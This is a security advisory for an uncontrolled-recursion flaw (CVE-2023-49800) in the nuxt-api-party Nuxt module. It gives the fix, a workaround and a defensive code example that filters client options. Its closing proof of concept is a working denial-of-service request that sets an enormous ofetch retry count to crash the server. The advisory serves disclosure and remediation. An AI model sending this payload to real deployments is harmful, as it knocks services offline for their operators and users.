Uncontrolled Recursion Affecting nuxt-api-party package, versions <0.22.1


Severity

High (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.05% (23rd percentile)

  • Snyk ID: SNYK-JS-NUXTAPIPARTY-6115221
  • Published: 11 Dec 2023
  • Disclosed: 9 Dec 2023
  • Credit: OhB00

Introduced: 9 Dec 2023

CVE-2023-49800
CWE-674

How to fix?

Upgrade nuxt-api-party to version 0.22.1 or higher.

Overview

nuxt-api-party is a Nuxt 3 module for securely connecting to any API.

Affected versions of this package are vulnerable to Uncontrolled Recursion through abuse of the retry logic of ofetch, the underlying fetch function: options supplied by the client in the request body are forwarded to ofetch, including its retry option. An attacker can crash the server with a stack overflow by sending a crafted request that specifies a very high number of retry attempts for a path known to fail, so that every attempt errors and ofetch keeps retrying.

Workaround

Limit which options from the incoming request are passed through to ofetch. In particular, do not let the client control retry-related options; keep the retry budget on the server side.
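The following is an added example illustrating the workaround above; it is not code from nuxt-api-party or ofetch. It contrasts the vulnerable pattern (spreading the client's JSON body straight into the options handed to ofetch) with an allowlist that copies only client-controllable fields and then applies a server-fixed retry policy. The field names considered client-controllable, the policy values, and the function names are assumptions made for the example; the ofetch call itself is left out so the code runs offline.

```javascript
// Added example, not the project's own code: build the options object a
// server-side proxy would pass to ofetch, with client-supplied fields filtered.

// Server-controlled retry policy (values are assumptions for this example).
// `retry`, `retryDelay` and `timeout` are real ofetch option names.
const SERVER_RETRY_POLICY = { retry: 2, retryDelay: 200, timeout: 10_000 };

// Fields the client may influence (assumed for this example). Anything else
// in the request body, such as `retry`, is dropped.
const CLIENT_ALLOWED_FIELDS = new Set(["path", "query", "headers", "method", "body"]);

// Vulnerable pattern: the parsed JSON body is spread into the options after the
// server defaults, so `retry: 9999999` from the client overrides them.
function unsafeBuildOptions(clientBody) {
  return { ...SERVER_RETRY_POLICY, ...clientBody };
}

// Hardened pattern: copy only allowlisted fields, validate the one field that
// must exist, and apply the server policy last so the client cannot override it.
// Returns the options plus the list of dropped keys (useful for logging).
function safeBuildOptions(clientBody) {
  if (clientBody === null || typeof clientBody !== "object" || Array.isArray(clientBody)) {
    throw new TypeError("request body must be a JSON object");
  }
  const filtered = {};
  const dropped = [];
  for (const [key, value] of Object.entries(clientBody)) {
    if (CLIENT_ALLOWED_FIELDS.has(key)) {
      filtered[key] = value;
    } else {
      dropped.push(key);
    }
  }
  if (typeof filtered.path !== "string" || filtered.path.length === 0) {
    throw new TypeError("path must be a non-empty string");
  }
  return { options: { ...filtered, ...SERVER_RETRY_POLICY }, dropped };
}

// Constructed input: the same JSON body the PoC on this page sends.
const pocBody = { path: "x:x", retry: 9999999 };
console.log("unsafe:", unsafeBuildOptions(pocBody)); // retry: 9999999 reaches ofetch
console.log("safe:", safeBuildOptions(pocBody));     // retry: 2, "retry" listed as dropped
```

The key detail is the spread order in the hardened version: server policy is spread after the filtered client fields, so even if a field name were later added to the allowlist by mistake, a client could still not raise the retry count. Dropped keys are returned rather than silently discarded so the handler can log probing requests that try to set retry or other ofetch options.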

PoC

// Assumes a Nuxt app running on localhost:3000 with nuxt-api-party configured
// with an endpoint named "MyEndpoint". The module's proxy route reads the
// request options from the JSON body and forwards them to ofetch.
await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
    method: "POST",
    // "x:x" is a path that can never be fetched successfully, so every attempt
    // fails and ofetch retries; the oversized retry count drives the recursion
    // until the server's stack overflows.
    body: JSON.stringify({ path: "x:x", retry: 9999999 }),
    headers: { "Content-Type": "application/json" }
})

CVSS Scores

version 3.1